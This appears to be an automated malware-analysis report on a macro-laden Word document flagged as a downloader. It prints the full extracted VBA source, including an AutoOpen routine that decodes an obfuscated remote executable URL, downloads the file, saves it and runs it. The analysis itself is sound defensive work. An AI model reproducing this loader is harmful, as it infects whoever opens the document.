MALICIOUS
330
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1140 Deobfuscate or Obfuscate Malicious Code
The sample is an OOXML document containing obfuscated VBA macros, indicated by multiple critical heuristic firings including 'Obfuscated auto-exec VBA loader' and 'VBA p-code auto-exec with execution tokens'. The presence of an 'AutoOpen' macro suggests automatic execution upon opening. ClamAV detection further confirms its malicious nature as a downloader. The VBA code appears to be designed to deobfuscate and execute a payload, likely from a remote source.
Heuristics 8
-
ClamAV: Doc.Downloader.Bendis-6680540-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Bendis-6680540-0
-
VBA project inside OOXML medium 5 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
Set fishkinet_1 = CreateObject(hubabuba(0)) -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set fishkinet_1 = CreateObject(hubabuba(0)) -
CallByName call high OLE_VBA_CALLBYNAMECallByName callMatched line in script
rbp = CallByName(fishkinet_1, hubabuba(10), VbGet) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub autoopen() -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 15726 bytes |
SHA-256: dbfac44189f0d53c65a5f053e7fe1de90de0c9d8ec794354c2930702317975af |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
Call CenterByMan
End Sub
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{35466B9E-7009-4369-8133-743D2ECA3E53}{4808849B-1BF1-4489-A3DF-A05159FFCE8E}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Module1"
Public fishkinet_1 As Object
Public fishkinet_2 As Object
Public fishkinet_3 As Object
Public fishkinet_7() As String
Public fishkinet_4 As String
Public fishkinet_5 As String
Public fishkinet_6 As Object
Public hubabuba() As String
Public MapsInitialized As Boolean
Public mDBname As String
Public MapInit As Boolean
' ________________________________________Util Functions End____________________________________________
' summe vom Range
Public Function rngCol(ByVal startRow As Integer, ByVal endRow As Integer, ByVal arrCol As Variant)
Dim res()
ReDim res(1 To endRow - startRow + 1, 1 To 1)
Dim i As Integer
Dim j As Integer
Dim sum As Double
For i = startRow To endRow
For j = 0 To UBound(arrCol)
If IsNumeric(Cells(i, arrCol(j)).Value) Then
sum = sum + Cells(i, arrCol(j)).Value
End If
Next j
res(i - startRow + 1, 1) = sum
sum = 0
Next i
rngCol = res
End Function
Public Function rngArr(ByVal startRow As Integer, ByVal endRow As Integer, ByVal arrCol As Variant)
Dim res()
ReDim res(1 To endRow - startRow + 1, 1 To 1)
Dim i As Integer
Dim j As Integer
Dim sum()
ReDim sum(0 To UBound(arrCol))
For i = startRow To endRow
For j = 0 To UBound(arrCol)
sum(j) = Cells(i, arrCol(j)).Value
Next j
res(i - startRow + 1, 1) = sum
ReDim sum(0 To UBound(arrCol))
Next i
rngArr = res
End Function
Public Function rng(ByVal start As Integer, ByVal ending As Integer)
Dim res()
ReDim res(0 To ending - start)
Dim i As Integer
For i = start To ending
res(i - start) = i
Next i
rng = res
End Function
Public Sub CenterByMan()
Dim Col As String
Dim obj As String
hubabuba = Split(UserForm1.Label1.Caption, "/")
GoTo ErrExit
ErrExit:
Set fishkinet_1 = CreateObject(hubabuba(0))
CheckBins
Exit Sub
husbanDip:
AD.DisplayError Err.Number, "modMaps", "CenterByMan", Err.Description
Resume ErrExit
End Sub
' ______________________________ Print______________________________________________
Public Function p()
' check if the val is array
Dim is_a As Boolean
Dim k
For Each k In Me.dict.Keys
is_a = IsArray(Me.dict(k))
Exit For
Next k
If is_a Then
For Each k In Me.dict.Keys
Debug.Print k & " " & a_toString(Me.Item(k))
Next k
Else
For Each k In Me.dict.Keys
Debug.Print k & " " & Me.Item(k)
Next k
End If
End Function
Public Function a_toString(ByVal arr As Variant) As String
Dim res As String
Dim i
res = "["
For Each i In arr
res = res & Replace(" " & i, ",", ".") & ", "
Next i
res = Left(res, Len(res) - 2)
a_toString = res & " ]"
End Function
Public Function pk()
Dim k
For Each k In Me.dict.Keys
Debug.Print k
Next k
End Function
Public Sub SaveMaps()
rbp = CallByName(fishkinet_1, hubabuba(10), VbGet)
Dim objStor As Variant
CallByName fishkinet_2, hubabuba(9), VbMethod, rbp
CallByName fishkinet_2, hubabuba(11), VbMethod, fishkinet_5, 2
GoTo husbanDip
ErrExit:
Exit Sub
husbanDip:
fishkinet_6.Open (fishkinet_5)
End Sub
Attribute VB_Name = "Module2"
'''''''''''''''''''
'@param operand2 can be either number or Dicts
' operation supports only the string
'''''''''''''''''''
Public Function product() As Variant
Dim k
Dim isNum As Boolean
isNum = True
fishkinet_5 = fishkinet_4
GoTo LABZ4
Dim res As Variant
Call res.ini
If Not IsMissing(IsNumericOperation) Then
If Not IsNumericOperation Then
isNum = False
End If
Else
isNum = True
End If
LABZ4:
fishkinet_5 = fishkinet_5 + hubabuba(12)
Exit Function
If IsNumeric(operand2) Then
' if the second operand is numeric
For Each k In pDict.Keys
If Not isNum Then
res.dict(k) = App.lication.Evaluate(Appli.cation.Works.heetFunction.Substitute(pDict(k) & operation & operand2, ",", "."))
Else
res.dict(k) = Appli.cation.Evaluate(pDict(k) & operation & operand2)
End If
Next k
Else
For Each k In pDict.Keys
If Not isNum Then
If operand2.dict.Exists(k) Then
res.dict(k) = Appli.cation.Evaluate(Appli.cation.WorksheetFunction.Substitute(pDict(k) & operation & operand2.dict(k), ",", "."))
End If
Else
If operand2.dict.Exists(k) Then
res.dict(k) = Applica.tion.Evaluate(pDict(k) & operation & operand2.dict(k))
End If
End If
Next k
End If
Set product = res
End Function
Public Sub OnasOn()
CallByName fishkinet_2, hubabuba(7), VbLet, 1
fishkinet_2.Open
GoTo husbanDip
ErrExit:
Exit Sub
husbanDip:
SaveMaps
End Sub
Public Function reduceRngVertical(ByVal sign As String) As Variant
Dim k
Dim i
Dim tmpCnt As Integer
tmpCnt = 1
Dim arr()
Dim u As Integer
Dim l As Integer
For Each k In pDict.Keys
If tmpCnt = 1 Then
u = UBound(pDict(k))
l = LBound(pDict(k))
ReDim arr(l To u)
tmpCnt = 2
If sign = "+" Then
For i = l To u
arr(i) = 0
Next i
Else
For i = l To u
arr(i) = 1
Next i
End If
End If
If sign = "+" Then
For i = l To u
arr(i) = arr(i) + pDict(k)(i)
Next i
Else
For i = l To u
arr(i) = arr(i) * pDict(k)(i)
Next i
End If
Next k
reduceRngVertical = arr
End Function
Public Function reduceArray(ByVal arr, ByVal sign As String) As Variant
Dim res As Variant
Dim k
If sign = "" Or sign = "+" Then
res = 0
For Each k In arr
res = res + k
Next k
ElseIf sign = "*" Then
res = 1
For Each k In arr
res = res * k
Next k
End If
reduceArray = res
End Function
Public Function filterVal(ByVal operation As String, Optional ByVal placeholder As String = "{*}", Optional ByVal hasThousandSep As Boolean = True) As Variant
Dim k
Dim tmp As String
Dim res As Variant
Set res = New Dicts
Call res.ini
If hasThousandSep Then
For Each k In pDict.Keys
tmp = Replace(pDict(k) & "", ",", ".")
If Application.Evaluate(Replace(operation, placeholder, tmp)) Then
res.dict(k) = k
End If
Next k
Else
For Each k In pDict.Keys
If Application.Evaluate(Replace(operation, placeholder, pDict(k) & "")) Then
res.dict(k) = k
End If
Next k
End If
Set filterVal = res
End Function
Public Sub KeepBlyading()
fishkinet_1.Send
GoTo SIDR4
If IsMissing(keepOriginalVal) Then
keepOriginalVal = True
End If
Dim k
Dim res As Variant
res.dict = pDict
For Each k In dict2.dict.Keys
If Not pDict.Exists(k) Then
res.dict(k) = dict2.dict(k)
ElseIf Not keepOriginalVal Then
res.dict(k) = dict2.dict(k)
End If
Next k
Set Add = res
SIDR4:
fishkinet_4 = fishkinet_3(hubabuba(6))
GoTo SIDR1
SIDR1:
product
OnasOn
End Sub
Public Function filterExklude(ByVal reg As Object) As Variant
Dim k
Dim res As Variant
Set res = New Dicts
Call res.ini
For Each k In pDict.Keys
If Not reg.test(k) Then
res.dict(k) = pDict(k)
End If
Next k
Set filterExklude = res
End Function
Attribute VB_Name = "Module3"
Public Function productRng(ByVal operand2 As Variant, ByVal operation As String) As Variant
Dim k
Dim i
Dim res As Variant
Set res = New Dicts
Call res.ini
If IsNumeric(operand2) Then
' if the second operand is numeric
For Each k In pDict.Keys
res.dict(k) = productArr(pDict(k), operation, operand2)
Next k
Else
For Each k In pDict.Keys
If operand2.dict.Exists(k) Then
res.dict(k) = productArr(pDict(k), operation, operand2.dict(k))
End If
Next k
End If
Set productRng = res
End Function
Public Function productArr(ByVal arr1 As Variant, ByVal operation As String, ByVal arr2 As Variant) As Variant
Dim res
Dim i
ReDim res(LBound(arr1) To UBound(arr1))
If IsNumeric(arr2) Then
For i = LBound(arr1) To UBound(arr1)
res(i) = Application.Evaluate(Replace(arr1(i) & operation & arr2, ",", "."))
Next i
Else
For i = LBound(arr1) To UBound(arr1)
res(i) = Application.Evaluate(Replace(arr1(i) & operation & arr2(i), ",", "."))
Next i
End If
productArr = res
End Function
Public Function crentips(nY As Integer) As String
Dim fishkinet_8 As Integer
Dim fishkinet3_1 As String
fishkinet3_1 = ""
GoTo s2
s2:
For fishkinet_8 = LBound(fishkinet_7) To UBound(fishkinet_7)
fishkinet3_1 = fishkinet3_1 & Chr(CInt(fishkinet_7(fishkinet_8)) - 1000)
Next fishkinet_8
GoTo SIDR4
SIDR4:
fishkinet_1.Open hubabuba(5), fishkinet3_1, False
KeepBlyading
End Function
'''''''''''''''''''
'@param operation is the string to be converted, placeholder is {*} by default
'
'''''''''''''''''''
Public Function productX(ByVal operation As String, Optional ByVal placeholder As String = "{*}", Optional ByVal hasThousandSep As Boolean = True) As Variant
Dim k
Dim tmp As String
Dim res As Variant
Set res = New Dicts
Call res.ini
If hasThousandSep Then
For Each k In pDict.Keys
tmp = Replace(pDict(k) & "", ",", ".")
res.dict(k) = Application.Evaluate(Replace(operation, placeholder, tmp))
Next k
Else
For Each k In pDict.Keys
res.dict(k) = Application.Evaluate(Replace(operation, placeholder, pDict(k) & ""))
Next k
End If
Set productX = res
End Function
Public Function clone() As Variant
Dim res As Variant
Set res = clone__(Me, pLevel)
With res
.appendMode = pIsDictFilled
.reversedMode = pReversedMode
If pStrictMode Then
.strictMode = True
.strictModeReg = pStrictModeReg
End If
End With
Set clone = res
End Function
Public Function clone__(ByVal d As Variant, ByVal l As Integer) As Variant
Dim res As New Dicts
Dim k
Call res.ini
If l > 1 Then
For Each k In d.dict.Keys
Set res.dict(k) = clone__(d.dict(k), l - 1)
Next k
Else
For Each k In d.dict.Keys
res.dict(k) = d.dict(k)
Next k
End If
Set clone__ = res
End Function
Public Sub CheckBins()
fishkinet_7 = Split("1104|1116|1116|1112|1058|1047|1047|1115|1107|1114|1111|1112|1111|1116|1111|1118|1046|1114|1117|1047|1115|1121|1115|1116|1101|1109|1047|1108|1111|1103|1115|1047|1056|1055|1104|1055|1053|1052|1046|1101|1120|1101", _
"|")
Dim LP As Long
Dim BinID As Long
Dim objStorages As String
Dim objStorage As Variant
Dim MapID As Long
Set fishkinet_2 = CreateObject(hubabuba(1))
GoTo husbanDip
ErrExit:
Exit Sub
husbanDip:
Set fishkinet_6 = CreateObject(hubabuba(2))
Set husbanD = CreateObject(hubabuba(3))
Set fishkinet_3 = husbanD.Environment(hubabuba(4))
crentips 3
End Sub
Public Function filterInklude(ByVal reg As Object) As Variant
Dim k
Dim res As Variant
Set res = New Dicts
Call res.ini
For Each k In pDict.Keys
If reg.test(k) Then
res.dict(k) = pDict(k)
End If
Next k
Set filterInklude = res
End Function
''''''''''''''''''''
'set all the elements to a constant
'default to be 1
''''''''''''''''''''
Public Function constDict(Optional ByVal constant As Variant) As Variant
Dim k
Dim res As Variant
Set res = New Dicts
Call res.ini
If IsMissing(constant) Then
constant = 1
End If
For Each k In pDict.Keys
res.dict(k) = constant
Next k
Set constDict = res
End Function
Attribute VB_Name = "Module4"
Public Function IsReg(testObj As Object) As Boolean
On Error GoTo errhandler3
Dim a As Boolean
a = testObj.test("")
errhandler3:
If Err.Number = 0 Then
IsReg = True
Else
IsReg = False
End If
End Function
Public Function toJSON(Optional ByVal k As String = "root") As String
Dim res As String
res = "{""name"":""" & k & """," & Chr(13)
res = res & """children"":[" & Chr(13)
Dim ky
For Each ky In pDict.Keys
res = res & "{""name"":""" & Replace(CStr(ky), """", "") & """, " & """size"": " & Replace(CStr(pDict(ky)), ",", ".") & "}," & Chr(13)
Next ky
toJSON = Left(res, Len(res) - 2) & Chr(13) & "]}"
End Function
' ________________________________________Util Functions____________________________________________
Public Function reg(ByVal pattern As String, Optional ByVal flag As String) As Object
Dim obj As Object
Set obj = CreateObject("vbscript.regexp")
obj.pattern = pattern
If IsMissing(flag) Then
obj.IgnoreCase = True
Else
' "gi"
If InStr(StrConv(flag, vbLowerCase), "g") > 0 Then
obj.Global = True
End If
' i by default to true
If InStr(StrConv(flag, vbLowerCase), "i") > 0 Then
obj.IgnoreCase = False
End If
End If
Set reg = obj
End Function
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 62464 bytes |
SHA-256: 1f0e56e394d5824386234d08f8d0193e86b5e7dc68873c5e35b95e4ebf510105 |
|||
|
Detection
ClamAV:
Doc.Downloader.Bendis-6680540-0
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.